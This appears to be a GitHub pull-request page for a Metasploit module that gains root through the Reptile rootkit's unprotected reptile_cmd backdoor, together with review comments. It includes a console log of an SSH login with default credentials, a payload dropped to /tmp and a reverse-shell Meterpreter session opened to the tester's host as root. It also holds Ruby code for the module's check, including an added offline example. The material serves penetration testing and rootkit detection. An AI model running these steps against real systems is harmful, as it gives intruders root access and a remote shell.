Add Reptile Rootkit reptile_cmd Privilege Escalation #12701

Merged: 1 commit merged from bcoles:reptile_rootkit_reptile_cmd_priv_esc into rapid7:master on Dec 21, 2019

Conversation

bcoles (Contributor) commented Dec 11, 2019

Add Reptile Rootkit reptile_cmd Privilege Escalation.

    This module uses Reptile rootkit's `reptile_cmd` backdoor executable
    to gain root privileges using the `root` command.

    This module has been tested successfully with Reptile from `master`
    branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
bcoles (Contributor, Author) commented Dec 11, 2019

This implementation is not particularly stealthy. It drops a payload to disk, and doesn't take advantage of any of Reptile's features, beyond simply leveraging reptile_cmd to elevate privileges.

The value of this module is largely derived from the check method. The reptile_cmd utility is not password protected, so it offers a trivial avenue to root, regardless of who installed it. If the rootkit has been installed to the default directory (/reptile), then this module can also be leveraged by post/multi/recon/local_exploit_suggester to scan a host for Reptile while performing other privesc checks.

@h00die h00die self-assigned this Dec 21, 2019
h00die (Contributor) commented Dec 21, 2019

Working for me, will check through the PR later, get this landed today

msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' ''
[*] Command shell session 1 opened (1.1.1.1:37937 -> 2.2.2.2:22) at 2019-12-21 07:55:28 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc 
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] The target is vulnerable.
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Writing '/tmp/.BF9f4W2hW1p' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (985320 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:43474) at 2019-12-21 07:56:07 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
Fragment of the module's check method quoted in a review comment (the branch body was not included in the quote):

```ruby
# Pipe `id` into reptile_cmd's `root` command; cmd_exec is Metasploit's
# session command runner, reptile_cmd_path the path resolved by the module.
res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
vprint_status "Output: #{res}"

# reptile_cmd printed its refusal string instead of running `id` as root
if res.include?('You have no power here!')
```
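The decision logic behind the check that bcoles describes (an unprotected reptile_cmd, probed by piping `id` into `reptile_cmd root`) and that the quoted fragment above implements, written out as an added example. This is plain Ruby, not the Metasploit module's code: the command runner is injected so it runs offline, the result symbols, the `test -x` existence probe and the sample host outputs are constructed for illustration, and treating the refusal string as "binary present but root not granted" is an assumption of the example.

```ruby
# Added example for this PR page: the decision logic of a Reptile
# reptile_cmd privilege-escalation check, written as plain Ruby rather than
# a Metasploit module so it runs offline. It mirrors the approach the PR
# describes (pipe `id` into `<reptile_cmd> root` and inspect what comes
# back); the injected runner, the result symbols, the existence probe and
# the sample outputs are constructed here and are not the module's code.

DEFAULT_REPTILE_CMD = '/reptile/reptile_cmd'.freeze  # default install dir named in the PR
NO_POWER = 'You have no power here!'.freeze         # refusal string the quoted fragment tests for

# Classify the output of `echo id | <reptile_cmd> root`.
#   :vulnerable - the backdoor ran `id` as uid 0, so root is one command away
#   :detected   - reptile_cmd answered with its refusal string (assumed here
#                 to mean the binary is present but did not grant root)
#   :unknown    - anything else (no output, unexpected text)
def classify_reptile_output(output)
  out = output.to_s.strip
  return :detected if out.include?(NO_POWER)
  return :vulnerable if out.match?(/\buid=0\b/)

  :unknown
end

# Full check through an injected command runner (runner.call(cmd) -> String).
# In a Metasploit module the runner would be cmd_exec; here it is anything
# that answers a shell command with a string. Returns :safe when nothing
# executable sits at the given path, otherwise the classification above.
def check_reptile_cmd(runner, path = DEFAULT_REPTILE_CMD)
  # Existence probe is an assumption of this example, not the module's method.
  present = runner.call("test -x #{path} && echo present").to_s.strip == 'present'
  return :safe unless present

  classify_reptile_output(runner.call("echo id|#{path} root"))
end

# Constructed sample hosts: a map from shell command to the output a session
# on that host would return. None of this came from a real target.
SAMPLE_HOSTS = {
  'rooted' => {
    "test -x #{DEFAULT_REPTILE_CMD} && echo present" => "present\n",
    "echo id|#{DEFAULT_REPTILE_CMD} root" => "uid=0(root) gid=0(root) groups=0(root)\n"
  },
  'refused' => {
    "test -x #{DEFAULT_REPTILE_CMD} && echo present" => "present\n",
    "echo id|#{DEFAULT_REPTILE_CMD} root" => "#{NO_POWER}\n"
  },
  'clean' => {} # nothing at /reptile, so every command returns empty output
}.freeze

# Build a runner that answers from one of the sample hosts.
def sample_runner(host)
  answers = SAMPLE_HOSTS.fetch(host)
  ->(cmd) { answers.fetch(cmd, '') }
end

if $PROGRAM_NAME == __FILE__
  SAMPLE_HOSTS.each_key do |host|
    puts "#{host}: #{check_reptile_cmd(sample_runner(host))}"
  end
end
```

Matching on `uid=0` rather than on the literal `uid=0(root)` keeps the check working on hosts where `id` prints a different root name, and the refusal string is checked first so a host that echoes the command back cannot be misread as rooted.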

h00die (Contributor) commented Dec 21, 2019

As assumed, code looks good; it's trivial at its most difficult, so going to go ahead and land!

h00die added a commit that referenced this pull request Dec 21, 2019
@h00die h00die merged commit 1ebfe6c into rapid7:master Dec 21, 2019
3 checks passed:
- Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
- Metasploit Automation - Test Execution: Successfully completed all tests.
- continuous-integration/travis-ci/pr: The Travis CI build passed.
h00die (Contributor) commented Dec 21, 2019

Release Notes

This adds a local privilege escalation against a host which has the Reptile Linux rootkit installed.

msjenkins-r7 added a commit that referenced this pull request Dec 21, 2019
h00die (Contributor) commented Dec 21, 2019

Why do I get the strange feeling there are a few more of these you have lined up to add :)

@bcoles bcoles deleted the bcoles:reptile_rootkit_reptile_cmd_priv_esc branch Dec 21, 2019